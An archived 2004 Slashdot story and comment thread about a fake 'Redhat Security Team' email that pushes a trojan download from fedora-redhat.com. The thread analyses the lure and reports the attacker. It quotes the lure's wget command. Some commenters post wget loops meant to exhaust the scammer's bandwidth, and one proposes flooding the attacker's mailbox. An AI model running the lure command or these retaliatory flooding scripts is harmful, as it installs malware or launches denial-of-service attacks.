Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Security Businesses Red Hat Software Software IT Linux

Beware 'Fedora-Redhat' Fake Security Alert 628

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
This discussion has been archived. No new comments can be posted.

Beware 'Fedora-Redhat' Fake Security Alert

Comments Filter:
  • I'll try it... (Score:5, Interesting)

    by enginuitor ( 779522 ) <Greg_Courville@G ... .com minus berry> on Sunday October 24, 2004 @08:56PM (#10617048) Homepage
    I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

    Stay tuned.
  • Stupid Tricks? (Score:5, Interesting)

    by dj_cel ( 744926 ) on Sunday October 24, 2004 @08:58PM (#10617073)
    It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
  • Re:I'll try it... (Score:2, Interesting)

    by busonerd ( 534486 ) on Sunday October 24, 2004 @09:00PM (#10617089)
    Same here. Lets use this thread for a discussion of wtf it does.
  • by Student_Tech ( 66719 ) on Sunday October 24, 2004 @09:26PM (#10617245) Journal
    From the top of that inst.c file:

    #if 0
    shc Version 3.7, Generic Script Compiler
    Copyright (c) 1994-2003 Francisco Rosales

    shc -v -r -T -f redhat
    #endif


    From shc's manpage:
    shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.


    Definitly doing something then, at least viewing the parent post.

  • Re:text of site (Score:4, Interesting)

    by MBCook ( 132727 ) <foobarsoft@foobarsoft.com> on Sunday October 24, 2004 @09:28PM (#10617262) Homepage
    Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was effected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all thoughout the advisory becomes "Red Hat" in the last line.

    Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

    This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.

    Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

    Most people could have done better, IMHO.

  • by vchoy ( 134429 ) on Sunday October 24, 2004 @09:31PM (#10617283)
    Going to the site, The use of Redhat logo and Redhat name itself is in clear violation of the trademark [redhat.com] guidelines. I am guessing it will not be too long before this site and domain is taken down.

    My question is: can these a**holes get away with using the 'fedora' name instead?

    ps. I am not affilated with RH in anyway.
    Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.
  • by antoy ( 665494 ) <[ten.lluneht] [ta] [sixela]> on Sunday October 24, 2004 @09:38PM (#10617321)
    Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

    Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

    Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

    Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

    First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

    In conclusion. I want to say that I believe if all people had:

    1) Startup Monitor [mlin.net] - Painfully simple, no one should be without it.
    2) Kerio Personal Firewall [kerio.com], or equivalent
    3) An executable monitor as described above.
    ,the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


    * SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)
  • by DrLZRDMN ( 728996 ) on Sunday October 24, 2004 @09:39PM (#10617330)
    yes but which Raymond Jackson? [google.com]

    Ones a teacher, one is guilty of child abuse (something to be unpopular for) and one just lost a football game today (/thinks of ace ventura plot)
  • by Zocalo ( 252965 ) on Sunday October 24, 2004 @09:48PM (#10617385) Homepage
    This hit the SpamAssassin mailling list a couple of days ago, the only difference is the location of the file which might help explain the Stanford reference. In the original the line was:

    wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
    but now it's:
    wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

    Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.

  • Re:I'll try it... (Score:1, Interesting)

    by Anonymous Coward on Sunday October 24, 2004 @09:51PM (#10617404)
    ok.. that's just weird. About 2 weeks ago I set work's firewall up to fwd SSH attempts to a sacrificial box on my network (it gave a login prompt but would deny any login attempts. I got a fuckton of login trys from some czech website with a 'mama' subdomain. about 10 root password guesses, and then 10 guesses of common login names. I diden't think much of it until I saw the names of the temp files created by this phisher.
  • by fucksl4shd0t ( 630000 ) on Sunday October 24, 2004 @09:52PM (#10617409) Homepage Journal

    And allowing only registered executables to run is a bad thing. Who should decide?

    On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.

    The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.

  • everyone now.... (Score:1, Interesting)

    by Anonymous Coward on Sunday October 24, 2004 @09:53PM (#10617417)
    wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz

    Let's use all of his bandwidth quota up.

  • Re:Real link? (Score:3, Interesting)

    by acidblood ( 247709 ) <decio@@@decpp...net> on Sunday October 24, 2004 @09:56PM (#10617426) Homepage
    This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.

    I'm running the following script on my box, and I recommend others to do the same.

    while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; rm fileutils-1.0.6.patch.tar.gz; done

    If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.
  • Re:I'll try it... (Score:1, Interesting)

    by Anonymous Coward on Sunday October 24, 2004 @09:58PM (#10617438)
    nmap addlebrain.com ...

    Every port is open? Is it running tcpdump?

    Probably is compromised.
  • by labratuk ( 204918 ) on Sunday October 24, 2004 @10:13PM (#10617527)
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
  • To : abuse@everyone.net,
    abuse@above.net
    Subject : malware using your netblock to propagate

    http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106

    The story reports on a linux trojan that, after installing, emails a
    report back to root@addlebrain.com. The MX record for addlebrain.com
    points to sitemail.everyone.net. It would reduce the effect of this if
    you could shut down that email account.

    Better yet, you should gather the list of infected IPs and then inform
    the owners.

    Damian Menscher
    --
    -=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
    -=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
    -=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
    -=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
    -=#| The above opinions are not necessarily those of my employers. |#=-
  • by at_slashdot ( 674436 ) on Sunday October 24, 2004 @10:44PM (#10617699)
    I confirm, it's Romanian, I translated in other post, nothing important, the writer is an idiot.
  • Comment removed (Score:3, Interesting)

    by account_deleted ( 4530225 ) on Monday October 25, 2004 @12:49AM (#10618265)
    Comment removed based on user account deletion
  • by FireFury03 ( 653718 ) <slashdot&nexusuk,org> on Monday October 25, 2004 @09:26AM (#10619965) Homepage
    Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it.

    Really? IMHO computers probably are as easy as cars. i.e. if my car needs some maintenance, I don't do it myself (at least, not for anything but the most simple stuff - I wouldn't know where to start), I go to the garage and pay someone who knows what he's doing to fix it. The same applies to computers - if you need some maintenance doing to your computer and you don't know enough to do it yourself then you should be paying a professional to look at it.

    Too many people have an attitude of "it should be simple enough for me to maintain" when it comes to computers - I have to ask why? How many people strip down their car engine and then are left with a pile of bits on the floor with no clue how to put them back together and blame the car manufacturer for not making it "easy enough"?

    Just because a computer plugs into the wall like a toaster doesn't mean that the user has a "right" to be able to maintain it without any training. I think people need to get out of the idea that computers are things which you buy and then they don't need any upkeep - computers are definately things that you buy and then need maintenance every so often. Some of us are knowledgable to do it ourselves, but the rest should get a professional to sort it out. Maybe manufacturers specifying that a computer requires a yearly service by a professional engineer would be a good idea?

This file will self-destruct in five minutes.

Working...